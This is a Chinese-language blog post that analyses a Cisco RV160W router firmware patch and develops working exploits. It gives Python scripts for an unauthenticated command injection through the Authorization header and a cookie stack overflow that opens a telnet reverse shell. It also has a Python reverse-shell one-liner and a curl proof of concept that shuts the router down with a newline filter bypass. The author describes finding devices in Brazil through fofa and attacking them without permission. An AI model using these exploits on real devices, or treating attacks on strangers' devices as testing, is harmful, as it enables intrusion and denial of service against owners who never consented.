Note
Search…
Cisco RV160W系列路由器漏洞:从1day分析到0day挖掘

前言

最近在分析思科RV160W这款路由器最新曝出的无条件RCE漏洞,官方已经推出更新补丁了,我diff固件查看变动代码,结果有了一些新发现

固件初步分析

根据官方的通告,Cisco Small Business RV160、RV160W、RV260、RV260P 和 RV260W VPN 路由器基于 Web 的管理界面中存在多个漏洞,可能允许未经身份验证的远程攻击者以root用户身份在受影响的设备上执行任意代码。这些漏洞在固件v1.0.01.02版本被修复
我去Cisco Software Center下载了两个版本固件
版本v1.0.01.01就是存在漏洞的固件
binwalk解压固件,寻找提供web服务的二进制文件,其实可以根据rc.d与init.d目录的一些初始化脚本盲猜,这里本着通用性与研究性的目的用另一种方式寻找。
由于手里没有设备,firmadyne有点鸡肋,于是我在油管上找了个RV160W的配置教程,观察浏览器上方的url,根据关键字符“configurationManagement”定位到admin.cgi,进而定位到web组件是mini_httpd(32位arm小端程序)。
1
[email protected]:~/blog/v1.0.01.01/rootfs$ grep -Rnl "configurationManagement" * 2>/dev/null
2
usr/sbin/admin.cgi
3
usr/lib/opkg/info/sbr-gui.list
4
www/gettingStarted.htm
5
www/configurationManagement.htm
6
www/app.min20200813.js
7
www/home.htm
8
[email protected]:~/blog/v1.0.01.01/rootfs$ grep -Rnl "admin.cgi" * 2>/dev/null
9
usr/sbin/mini_httpd
10
usr/sbin/admin.cgi
11
usr/lib/opkg/info/sbr-gui.list
12
[email protected]:~/blog/v1.0.01.01/rootfs$ file ./usr/sbin/mini_httpd
13
./usr/sbin/mini_httpd: ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.3, for GNU/Linux 2.6.16, stripped
Copied!
定位到web服务程序后,我们对两个版本固件的mini_httpd程序进行二进制代码对比(当然也有对 admin.cgi 进行对比,也存在不少改动代码,但这次我只关注mini_httpd组件部分)
最经典的是bindiff这款工具,但是我用它并没有找到关键代码改动部分
之后又使用了一款IDA插件diaphora,导出sqlite数据库后进行对比,发现 mini_httpd2 的 sub_1B034 函数(对应mini_httpd1的sub_1AF58函数)和sub_15CE4函数(对应mini_httpd1的sub_15CE4函数)改动较明显。
mini_httpd1
分析sub_1AF58函数改动部分
分别定位到两个程序相关代码部分
mini_httpd1
mini_httpd1
mini_httpd2
mini_httpd2
在新版本的sub_1B340中,将格式化后的v3作为参数传递给system,在这之前v3经过了一次sub_1B034函数
sub_1b034函数是新加入的,里面大概是过滤字符的功能
这里已经不能再明显了,system函数处存在命令注入,于是mini_httpd2用过滤危险字符的方式修复了这个漏洞。
分析sub_15CE4函数改动部分
mini_httpd1
mini_httpd1
mini_httpd2
mini_httpd2
将strcpy函数替换成了strncpy函数。断定此处strcpy存在栈溢出漏洞。
对固件的初步逆向分析后,基本判定老版本固件至少存在命令注入和栈溢出这两个漏洞。

固件模拟

模拟httpd服务,为了之后附加进程调试,我选用qemu系统模式进行模拟。
拷贝1.0.01.01固件文件系统进qemu,挂载一些关键目录后以chroot执行sh.
1
[email protected]:~/rootfs# ls
2
bin etc media overlay rom sbin test_scripts usr www
3
dev lib mnt proc root sys tmp var
4
[email protected]:~/rootfs# mount -t proc /proc/ ./proc/
5
[email protected]:~/rootfs# mount -t devtmpfs /dev/ ./dev/
6
[email protected]:~/rootfs# chroot . ./bin/sh
7
8
BusyBox v1.23.2 (2020-08-17 10:59:42 IST) built-in shell (ash)
9
10
/ #
Copied!
在运行mini_httpd之前可能需要初始化环境目录,这些往往都在rc.d与init.d启动脚本里面,所以全局搜索引用“mini_httpd”的地方
1
[email protected]:~/cve/RV160W/rootfs$ grep -Rnl "mini_httpd" * 2>/dev/null
2
etc/scripts/mini_httpd/mini_httpd.sh
3
etc/rc.d/S23mini_httpd.init
4
etc/init.d/mini_httpd.init
5
etc/init.d/config_update.sh
6
usr/sbin/mini_httpd
7
usr/sbin/admin.cgi
8
usr/lib/opkg/info/sbr-gui.list
Copied!
发现etc/scripts/mini_httpd/mini_httpd.shetc/rc.d/S23mini_httpd.initetc/init.d/mini_httpd.init 这些里面的内容都差不多,大概都是初始化一些文件然后最终启动/usr/sbin/mini_httpd
1
#!/bin/sh /etc/rc.common
2
3
START=23
4
5
version_gt() {
6
test "$(echo "[email protected]" | tr " " "\n" | sort -n | head -n 1)" != "$1";
7
}
8
get_version() {
9
version=`cat $1 | grep "\"VERSION\"" | awk -F '"' '{print $4}'`
10
if [[ "${version/V/}" != "$version" ]]; then
11
version=`echo $version | awk -F 'V' '{print $2}'`
12
fi
13
echo $version
14
}
15
start() {
16
fwLgPath="/www/lang"
17
mntLgPath="/mnt/packages/languages"
18
mkdir -p /tmp/download
19
mkdir -p /tmp/download
20
mkdir -p /tmp/download/certificate
21
mkdir -p /tmp/download/log
22
mkdir -p /tmp/download/configuration
23
mkdir -p /tmp/www
24
mkdir -p /tmp/portal_img
25
if [ ! -d /mnt/packages/languages ]; then
26
mkdir -p /mnt/packages/languages
27
cp -rf ${fwLgPath}/* ${mntLgPath}
28
else
29
# check version
30
list="English Spanish Frensh German Itailian"
31
for i in $list; do
32
if [ -f ${fwLgPath}/${i}.js ]; then
33
if [ -f ${mntLgPath}/${i}.js ]; then
34
tmp_version=`cat ${mntLgPath}/${i}.js | grep "\"VERSION\"" | awk -F '"' '{print $4}'`
35
fw_version=$(get_version ${fwLgPath}/${i}.js)
36
mnt_version=$(get_version ${mntLgPath}/${i}.js)
37
if [[ "${tmp_version/V/}" != "$tmp_version" ]]; then
38
cp -f ${fwLgPath}/${i}.js ${mntLgPath}/${i}.js
39
elif ! version_gt $mnt_version $fw_version; then
40
cp -f ${fwLgPath}/${i}.js ${mntLgPath}/${i}.js
41
fi
42
else
43
cp ${fwLgPath}/${i}.js ${mntLgPath}/${i}.js
44
fi
45
fi
46
done
47
fi
48
49
/etc/scripts/mini_httpd/mini_httpd.sh start
50
}
51
52
stop() {
53
/etc/scripts/mini_httpd/mini_httpd.sh stop
54
}
55
56
reload() {
57
/etc/scripts/mini_httpd/mini_httpd.sh reload
58
}
Copied!
我试着运行了一个
1
/ # /etc/init.d/mini_httpd.init
2
uci: Entry not found
3
Syntax: /etc/init.d/mini_httpd.init [command]
4
5
Available commands:
6
start Start the service
7
stop Stop the service
8
restart Restart the service
9
reload Reload configuration files (or restart if that fails)
10
enable Enable service autostart
11
disable Disable service autostart
12
13
/ # /etc/init.d/mini_httpd.init start
14
uci: Entry not found
15
ls: /mnt/configcert/confd/startup/: No such file or directory
16
use backup cert for mini-httpd ...
17
1 0 0 0
18
setsockopt SO_REUSEADDR: Protocol not available
19
setsockopt SO_REUSEADDR: Protocol not available
20
/usr/sbin/mini_httpd: can't bind to any address
21
/ #
Copied!
发现报错can't bind to any address,这个报错在mini_httpd程序中,此时一些文件其实已经初始化了,我们可以只关注mini_httpd程序本身。
我们直接运行mini_httpd,同样的报错
1
/ # /usr/sbin/mini_httpd
2
setsockopt SO_REUSEADDR: Protocol not available
3
setsockopt SO_REUSEADDR: Protocol not available
4
/usr/sbin/mini_httpd: can't bind to any address
Copied!
错误原因是setsockopt函数在调用时协议参数不合法,经过一番尝试后无果;最后想到这种设置套接字属性的函数,其实hook掉对连接的影响也不是很大,关键服务能起来就行。
定位到程序报错点,是setsockopt失败返回负值导致的错误。
我索性将setsockopt函数hook全返回1
1
/*arm-linux-gnueabi-gcc -shared -fPIC hook.c -o hook */
2
#include <stdio.h>
3
#include <stdlib.h>
4
#include<sys/socket.h>
5
6
int setsockopt(int sockfd, int level, int optname,
7
const void *optval, socklen_t optlen)
8
{
9
10
return 1;
11
}
Copied!
1
BusyBox v1.23.2 (2020-08-17 10:59:42 IST) built-in shell (ash)
2
3
/ # LD_PRELOAD="/hook" ./usr/sbin/mini_httpd
4
bind: Address already in use
5
/ # ./usr/sbin/mini_httpd: started as root without requesting chroot(), warning only
6
7
/ # ps |grep mini_httpd
8
2364 root 3540 S ./usr/sbin/mini_httpd
9
2369 root 3120 S grep mini_httpd
Copied!
可以看到服务跑起来了,访问试试
根据403字符定位到程序中
执行sub_1b5f0函数后就退出了,猜测是某些环境变量的问题,这里为了不改变代码逻辑,我直接patch mini_httpd程序代码块,把跳转 sub_1B5F0的地方nop掉
before_nop
nop
再次执行程序后访问web

固件逆向分析与调试

接下来就是对mini_httpd的详细逆向过程,其实就是寻找触发路径。

命令注入漏洞分析

我把漏洞触发函数改成了vuln,以及调用vuln的上层函数vuln_back1,上上层函数vuln_back2........

vuln_back2

在vuln_back2中看出,我们只需要contrl_arg字符串里面包含"dniapi/"即可进入vuln_back1
vuln_back2
在往上看,contrl_arg被赋值成dword_34F60 + 1,并且dword_34F60第一个字符必须为'/',这里可以猜测contrl_arg是一个请求行的URL
vuln_back2
为了验证我的猜测,动态调试一下,由于所有的请求都被放在了fork子进程中处理。我这里暂时为了方便调试,hook了fork函数返回0,构造了GET /hello.txt

vuln_back1

在vuln_back1中判断了contrl_arg是否是相关字符,不是就会去执行vuln,调用vuln时传入了contrl_arg这个参数
vuln_back1

vuln

vuln函数里面还有最后一层判断,必须让contrl_arg的前9个字符等于"download/"
vuln
所以综上,我们可以构造GET请求URL为"/download/dniapi/",为了能触发system函数,我还需要调整contrl_cmd的值为"Basic "
查找引用,发现在vuln_back2函数中给contrl_cmd赋值
vuln_back2
大胆猜测,这里就是HTTP的head的Authorization字段
综上,最终能触发到system函数的请求大致如下(当然实际还需添加一些标准head)
1
GET /download/dniapi/ HTTP/1.1
2
Authorization: Basic xxxxxxxxxxxxxxxxxxxxxxxxx
Copied!
vuln通过sub_1E19C函数处理contrl_cmd + 6Basic之后的字符串),结果放入v5,最终将v5作为拼接命令的一部分。
table
3字节一组,以及明显的base64解码字符表,经验证sub_1E19C就是base64解密函数。
所以只需要将请求Authorization: Basic后的字符换成想要执行命令的base64编码形式,同时用;字符截断原有的curl命令,就可以执行任意命令,下面以date命令为例。

Command Inject EXP

1
import requests
2
import sys
3
import base64
4
import urllib3
5
6
if len(sys.argv)!=3:
7
print "Parameter error. python exp.py url \"command\""
8
exit(0)
9
10
url = sys.argv[1]
11
cmd = sys.argv[2]
12
13
CMD=";"+cmd+";"
14
CMD=base64.b64encode(CMD)
15
16
header = {'Authorization':"Basic "+CMD}
17
18
urllib3.disable_warnings()
19
20
if url[-1:]=='/':
21
url=url[:-1]
22
r = requests.get(url+"/download/dniapi/", headers=header,verify=False)
23
24
print "DONE!"
Copied!

栈溢出漏洞分析

同样我将漏洞触发函数重命名成overflow,上层函数overflow_back1、overflow_back2
在vuln_back2函数里,处理 cookie 并且作为参数传入overflow_back2函数。
在这之前会有一个check,检查当前请求的url资源内容是否是需要登录才能访问
所以这里需要请求这些资源,使其返回1。
overflow_back2里判断cookie不为空后进入overflow_back1
然后就是检索cookie是否包含sessionID,包含的话,将其以空格分隔后,传入overflow函数
overflow函数中形参a2指向空字符,所以其实最后就是未限制sessionID长度在strcpy时的溢出。
POC如下:
1
import requests
2
import urllib3
3
import sys
4
5
url = sys.argv[1]
6
7
if url[-1:]=='/':
8
url=url[:-1]
9
10
cmd="aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaac"
11
12
payload = "sessionID="+cmd
13
14
urllib3.disable_warnings()
15
16
url= url+"/help"
17
head= {'Cookie':payload}
18
r=requests.get(url,headers=head,verify=False)
19
20
print(r)
21
print(r.text)
22
print(r.content)
Copied!
分析crash结果,得知是在overflow函数返回前抛出的内存引用异常。原因是数据过长,覆盖了压入栈中的第五个参数a5,它刚好位于返回地址下方,导致最后一个strcpy往a5变量地址写数据时,该地址不合法。
所以为了能够保证利用,需要刚好覆盖到overflow函数的返回地址。
经过调试,测得偏移为268,POC如下:
1
import requests
2
import urllib3
3
import sys
4
5
url = sys.argv[1]
6
7
if url[-1:]=='/':
8
url=url[:-1]
9
10
payload = "sessionID=1234".ljust(268,"a")+"bbb"
11
12
urllib3.disable_warnings()
13
14
url= url+"/help"
15
head= {'Cookie':payload}
16
r=requests.get(url,headers=head,verify=False)
17
18
print(r)
19
print(r.text)
20
print(r.content)
Copied!
可以看到返回地址被覆盖成了bbb(0x626262),且可以观察到此时的r0寄存器指向sessionID=后的字符串1234...,因此可以在sessionID=后放置命令字符串,然后控制PC跳转到system函数上。由于cookie在overflow_back1函数中被过滤了空格,在overflow中被过滤了等号,导致命令执行受限,空格可以用${IFS}替换,等号只能避免使用了。

Stack Overflow EXP

关于system执行命令,我并不想去另寻僻径去ROP或者是上传后门程序,我尝试了很多技巧,最终以这种较为简单且通用的方式弹shell(输入与输出分离)。
1
import requests
2
import urllib3
3
import sys
4
5
6
if len(sys.argv)!=5:
7
print "Parameter error. python exp.py url reverse_shell_host input_port output_port"
8
exit(0)
9
10
11
url = sys.argv[1]
12
reverse_shell_host = sys.argv[2]
13
input_port= sys.argv[3]
14
output_port= sys.argv[4]
15
16
17
if url[-1:]=='/':
18
url=url[:-1]
19
20
21
cmd="telnet "+reverse_shell_host+" "+input_port+" | /bin/sh | telnet "+reverse_shell_host+" "+output_port
22
23
cmd2=cmd.replace(' ',"${IFS}")
24
25
26
payload = ("sessionID="+cmd2+";").ljust(268,"a")
27
payload += "\x1c\xb1\x01"
28
29
30
urllib3.disable_warnings()
31
32
url= url+"/help"
33
head= {'Cookie':payload}
34
r=requests.post(url,headers=head,verify=False)
35
36
print(r)
37
print(r.text)
38
print(r.content)
Copied!

本地测试

以Command Inject EXP为例:
1
python exp.py http://192.168.122.12 "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.122.11\",3333));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
Copied!

真实设备测试

由于我手里没有真实设备,只能找一些公网上的设备验证。
用burpsuit抓包获取设备特征
Content-Security-Policy:是一个很明显的特征
在fofa上搜索 header="frame-ancestors 'self' 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline' 'unsafe-eval'"
我这里只搜索了巴西的
用exp打来试试

收获0day

一开始我补丁比较的时候就发现,v1.0.01.02固件在sprintf之前加入了字符过滤函数
该函数完整代码如下
1
_BYTE *__fastcall filer(_BYTE *output, _BYTE *input, int a3_1024)
2
{
3
_BYTE *v3; // r3
4
_BYTE *v4; // r3
5
_BYTE *v5; // r3
6
_BYTE *v6; // r3
7
_BYTE *v7; // r3
8
_BYTE *v8; // r2
9
int v9; // [sp+10h] [bp-14h]
10
_BYTE *v10; // [sp+14h] [bp-10h]
11
int v12; // [sp+1Ch] [bp-8h]
12
int v13; // [sp+1Ch] [bp-8h]
13
int v14; // [sp+1Ch] [bp-8h]
14
15
v12 = 0;
16
v9 = a3_1024 - 1;
17
v10 = output;
18
while ( *input )
19
{
20
if ( *input == '~'
21
|| *input == '`'
22
|| *input == '#'
23
|| *input == '#x27;
24
|| *input == '&'
25
|| *input == '*'
26
|| *input == '('
27
|| *input == ')'
28
|| *input == '|'
29
|| *input == '['
30
|| *input == ']'
31
|| *input == '{'
32
|| *input == '}'
33
|| *input == ';'
34
|| *input == '\''
35
|| *input == '"'
36
|| *input == '<'
37
|| *input == '>'
38
|| *input == '/'
39
|| *input == '?'
40
|| *input == '!'
41
|| *input == ' '
42
|| *input == '='
43
|| *input == '\t' )
44
{
45
v3 = v10++;
46
*v3 = '\\';
47
if ( ++v12 >= v9 )
48
break;
49
}
50
else if ( *input == '\\' )
51
{
52
v4 = v10++;
53
*v4 = '\\';
54
v13 = v12 + 1;
55
if ( v13 >= v9 )
56
break;
57
v5 = v10++;
58
*v5 = '\\';
59
v14 = v13 + 1;
60
if ( v14 >= v9 )
61
break;
62
v6 = v10++;
63
*v6 = '\\';
64
v12 = v14 + 1;
65
if ( v12 >= v9 )
66
break;
67
}
68
v7 = v10++;
69
v8 = input++;
70
*v7 = *v8;
71
if ( ++v12 >= v9 )
72
break;
73
}
74
*v10 = 0;
75
return output;
76
}
Copied!
经分析,它的功能主要是检索字符串,一旦检测到敏感字符,就将在该字符前面加上一个转义符"\"
比如我们构造命令ls -all,被它处理后字符变成了ls\ -all
我试了各种方法,都无法绕过
但是我发现它并没有过滤换行符"\n",这可以让我们使用换行符截断命令,但是我们只能执行一些环境变量目录下的程序,并且还不能跟参数,可能的用处是开启一些对外的接口比如telnetd或其它。
但这也是一个很严重的过滤缺陷,因为我们可以构造"\npoweroff\n"来使路由器关机,这直接是拒绝服务攻击了

EXP

根据上面Command Inject EXP代码,将字符拼接处的;换成\n即可。
1
# affect firmware version <1.0.01.04
2
import requests
3
import sys
4
import base64
5
import urllib3
6
7
if len(sys.argv)!=3:
8
print "Parameter error. python exp.py url \"command with no parameters\""
9
exit(0)
10
11
url = sys.argv[1]
12
cmd = sys.argv[2]
13
14
CMD="\n"+cmd+"\n"
15
CMD=base64.b64encode(CMD)
16
17
header = {'Authorization':"Basic "+CMD}
18
19
urllib3.disable_warnings()
20
21
if url[-1:]=='/':
22
url=url[:-1]
23
r = requests.get(url+"/download/dniapi/", headers=header,verify=False)
24
25
print "DONE!"
Copied!

测试

尝试过注入telnetd命令来开启telnetd服务
但经1day打进去的公网设备验证发现,该系列路由器里没有配置用户密码。
下面只尝试poweroff的命令注入(效果最直观明显)。POC如下
1
curl -i -s -k -X #x27;GET' \
2
-H #x27;Host: 127.0.0.1' -H #x27;User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:87.0) Gecko/20100101 Firefox/87.0' -H #x27;Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H #x27;Accept-Language: en-US,en;q=0.5' -H #x27;Accept-Encoding: gzip, deflate' -H #x27;Connection: close' -H #x27;Cookie: local_lang=%22English%22; ru=0' -H #x27;Authorization: Basic CnBvd2Vyb2ZmCg==' -H #x27;Upgrade-Insecure-Requests: 1' -H #x27;If-Modified-Since: Wed, 07 Apr 2021 11:28:48 GMT' -H #x27;Cache-Control: max-age=0' \
3
-b #x27;local_lang=%22English%22; ru=0' \
4
#x27;https://127.0.0.1/download/dniapi/'
Copied!
在公网上找了个用1day打getshell失败 但使用POC成功宕机的

Notices

目前该漏洞已经提交给了思科厂商,思科已确认了该漏洞并修复。https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-rv-code-execution-9UVJr7k4.html